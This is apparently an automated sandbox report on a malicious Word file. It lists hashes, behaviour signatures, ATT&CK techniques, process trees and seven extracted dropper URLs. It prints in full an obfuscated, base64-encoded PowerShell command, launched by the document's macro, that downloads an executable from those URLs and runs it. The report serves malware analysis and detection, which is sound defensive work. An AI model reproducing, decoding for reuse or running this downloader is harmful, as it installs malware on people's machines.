9c2e5cace48f8be6f1097cafd2ed1709567e06874bd0ec10a17bfb6cb2d49bcc

General

Target

9cd5b312fe77e3884521aaa3bcc57030_JaffaCakes118.doc
Size

172KB
MD5

9cd5b312fe77e3884521aaa3bcc57030
SHA1

cf09e7ddfe7ea83aafa5a7c91d0be6aadcda7f9d
SHA256

9c2e5cace48f8be6f1097cafd2ed1709567e06874bd0ec10a17bfb6cb2d49bcc
SHA512

381c15d89fc83b357b4eaa83c5fb8cdcf6d02f99c4abefe56941a6f768b9958e870d672890af3d829423535f5a374df6f9046ce5b49e331bebe245e3df5edec9
SSDEEP

1536:LGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xiP2hCYey7dL6PhLtHrxM43atHtjB:ZrfrzOH98ipglHD+3KvoEwxQ

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://smartfarmsky.com/kdxhp/K/

exe.dropper

https://theonesmartpiano.com/wp-admin/css/colors/modern/W/

exe.dropper

https://www.breedenandsilver.com/wp-content/W3/

exe.dropper

https://blog.workshots.net/bibqcr9/GSB/

exe.dropper

https://lggpm.live/cgi-bin/Yq/

exe.dropper

https://sodalite.life/wp-content/uploads/Fl/

exe.dropper

https://classroom.live/wp-content/OlY/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3032	3052	powershell.exe	81

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1696	WINWORD.EXE
1696	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3032	powershell.exe
3032	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3032	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1696	WINWORD.EXE
1696	WINWORD.EXE
1696	WINWORD.EXE
1696	WINWORD.EXE
1696	WINWORD.EXE
1696	WINWORD.EXE
1696	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9cd5b312fe77e3884521aaa3bcc57030_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -encod JABaAHEAcQBwADkANwBoAD0AKAAoACcAVQB2AF8AMQBpACcAKwAnAHIAJwApACsAJwBpACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAdQBTAEUAUgBwAFIATwBGAGkATABlAFwAbgB5AGwANAByAFQAVwBcAG8ATgBLAEcAbwBNAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAGAAVQByAGkAVAB5AFAAcgBPAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAHQAbAAnACsAKAAnAHMAMQAyACcAKwAnACwAJwApACsAKAAnACAAdAAnACsAJwBsAHMAJwApACsAKAAnADEAJwArACcAMQAsACAAdABsAHMAJwApACkAOwAkAFQAeQB2AHMANAByAGcAIAA9ACAAKAAoACcARwA0ACcAKwAnAHoAMgBsAF8AJwApACsAJwBuACcAKQA7ACQAWgA5AGQANgAwADAAZgA9ACgAKAAnAEMAdwB0AG0AJwArACcAYQAnACkAKwAnADMAJwArACcAOQAnACkAOwAkAEsAdwB1AHkAaABpAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwA0AHkAWgAnACsAJwBOACcAKQArACcAeQAnACsAJwBsACcAKwAoACcANAByAHQAdwA0ACcAKwAnAHkAWgAnACsAJwBPACcAKQArACcAbgAnACsAKAAnAGsAJwArACcAZwBvAG0AdgA0AHkAJwArACcAWgAnACkAKQAuACIAUgBlAFAAYABsAEEAYABjAEUAIgAoACgAWwBjAGgAQQByAF0ANQAyACsAWwBjAGgAQQByAF0AMQAyADEAKwBbAGMAaABBAHIAXQA5ADAAKQAsACcAXAAnACkAKQArACQAVAB5AHYAcwA0AHIAZwArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEwANgBfADcAdAA3AG8APQAoACgAJwBEAGEAMAAnACsAJwB2ACcAKQArACcAeAAnACsAJwA1AHoAJwApADsAJABQADMAawA2AGEAcgB0AD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcARQBCAGMATABJAGUATgBUADsAJABTADkAZQAyAG8ANQAwAD0AKAAoACcAaAB0AHQAcAAnACsAJwA6ACcAKQArACcALwAvACcAKwAoACcAcwAnACsAJwBtAGEAcgB0ACcAKwAnAGYAYQAnACkAKwAoACcAcgBtAHMAawB5AC4AYwAnACsAJwBvAG0AJwArACcALwBrAGQAeABoACcAKQArACgAJwBwAC8ASwAvACcAKwAnACoAaAB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8ALwB0AGgAJwArACcAZQBvAG4AJwArACcAZQBzAG0AYQAnACsAJwByACcAKwAnAHQAJwApACsAJwBwACcAKwAoACcAaQBhAG4AJwArACcAbwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwB3AHAALQAnACsAJwBhAGQAbQBpACcAKwAnAG4AJwArACcALwBjAHMAcwAnACkAKwAoACcALwAnACsAJwBjACcAKwAnAG8AbABvAHIAcwAvAG0AJwApACsAKAAnAG8AZAAnACsAJwBlAHIAJwApACsAJwBuAC8AJwArACgAJwBXACcAKwAnAC8AKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAcwAnACsAKAAnADoALwAnACsAJwAvAHcAJwApACsAKAAnAHcAdwAnACsAJwAuAGIAcgAnACkAKwAnAGUAJwArACgAJwBlACcAKwAnAGQAZQAnACkAKwAoACcAbgBhACcAKwAnAG4AJwApACsAKAAnAGQAcwAnACsAJwBpAGwAdgBlACcAKQArACgAJwByAC4AJwArACcAYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwBvAG4AdABlACcAKwAnAG4AdAAvACcAKwAnAFcAJwApACsAKAAnADMAJwArACcALwAqAGgAJwApACsAJwB0AHQAJwArACgAJwBwAHMAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAGIAbABvAGcALgAnACsAJwB3AG8AcgBrACcAKwAnAHMAaABvAHQAcwAnACsAJwAuAG4AZQB0AC8AJwArACcAYgBpACcAKQArACcAYgAnACsAKAAnAHEAYwByACcAKwAnADkALwAnACsAJwBHACcAKQArACgAJwBTACcAKwAnAEIALwAqAGgAJwApACsAKAAnAHQAJwArACcAdABwACcAKQArACcAcwA6ACcAKwAoACcALwAvACcAKwAnAGwAZwAnACkAKwAoACcAZwBwAG0ALgAnACsAJwBsAGkAJwArACcAdgBlAC8AJwApACsAKAAnAGMAJwArACcAZwBpAC0AYgBpACcAKQArACgAJwBuACcAKwAnAC8AWQBxACcAKQArACcALwAnACsAKAAnACoAJwArACcAaAB0AHQAJwApACsAJwBwACcAKwAnAHMAJwArACcAOgAnACsAKAAnAC8ALwBzAG8AZAAnACsAJwBhAGwAJwApACsAKAAnAGkAdAAnACsAJwBlAC4AbABpACcAKQArACgAJwBmAGUAJwArACcALwB3ACcAKQArACgAJwBwAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwAnACkAKwAoACcAdQAnACsAJwBwAGwAJwApACsAKAAnAG8AJwArACcAYQBkACcAKQArACcAcwAvACcAKwAnAEYAbAAnACsAKAAnAC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcABzADoALwAvACcAKwAnAGMAbABhAHMAcwAnACsAJwByAG8AJwArACcAbwAnACkAKwAoACcAbQAuAGwAJwArACcAaQAnACkAKwAoACcAdgAnACsAJwBlAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACcALQBjACcAKwAoACcAbwAnACsAJwBuAHQAZQAnACkAKwAoACcAbgAnACsAJwB0AC8ATwAnACkAKwAoACcAbAAnACsAJwBZAC8AJwApACkALgAiAFMAYABwAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQwB2AHAAXwAzAG0AdAA9ACgAKAAnAEsAJwArACcAdQB4ACcAKQArACcAeAA5ACcAKwAnADcAagAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABUAHAAeQBoAG8AeAAzACAAaQBuACAAJABTADkAZQAyAG8ANQAwACkAewB0AHIAeQB7ACQAUAAzAGsANgBhAHIAdAAuACIARABgAE8AdwBuAGAAbABgAG8AQQBEAGYASQBsAEUAIgAoACQAVABwAHkAaABvAHgAMwAsACAAJABLAHcAdQB5AGgAaQBmACkAOwAkAFcAYgBrAHEAXwByAG0APQAoACcATwAnACsAJwBhACcAKwAoACcAegA5ACcAKwAnAF8AdgAzACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEsAdwB1AHkAaABpAGYAKQAuACIATABgAGUAbgBHAFQAaAAiACAALQBnAGUAIAAyADUAMwAxADcAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwAnACsAJwBrAGUALQBJAHQAZQBtACcAKQAoACQASwB3AHUAeQBoAGkAZgApADsAJABOAGoAcQBtADAANgBlAD0AKAAoACcARQAnACsAJwByADAAJwApACsAJwBpACcAKwAoACcAMwAnACsAJwBmAGoAJwApACkAOwBiAHIAZQBhAGsAOwAkAE0AMQB3AHQAaQBfAHcAPQAoACcASAAnACsAKAAnAHAAMwB4AHYAJwArACcANgA2ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKAHoAcAB4ADQAZgA4AD0AKAAnAEUAZQAnACsAKAAnADYAJwArACcAXwBuADgAJwApACsAJwA0ACcAKQA=
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hb3vebhu.tly.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1696-16-0x00007FF7C5A80000-0x00007FF7C5A90000-memory.dmp

Filesize
64KB

Download
memory/1696-107-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-3-0x00007FF807DCD000-0x00007FF807DCE000-memory.dmp

Filesize
4KB

Download
memory/1696-4-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-5-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-6-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-10-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-8-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-9-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-14-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-13-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-12-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-15-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-11-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-111-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-1-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-7-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-18-0x00007FF7C5A80000-0x00007FF7C5A90000-memory.dmp

Filesize
64KB

Download
memory/1696-24-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-25-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-51-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-17-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-2-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-83-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-84-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-85-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-86-0x00007FF807D30000-0x00007FF807F25000-memory.dmp

Filesize
2.0MB

Download
memory/1696-108-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-109-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-0-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/1696-110-0x00007FF7C7DB0000-0x00007FF7C7DC0000-memory.dmp

Filesize
64KB

Download
memory/3032-66-0x00000195FCFD0000-0x00000195FCFF2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads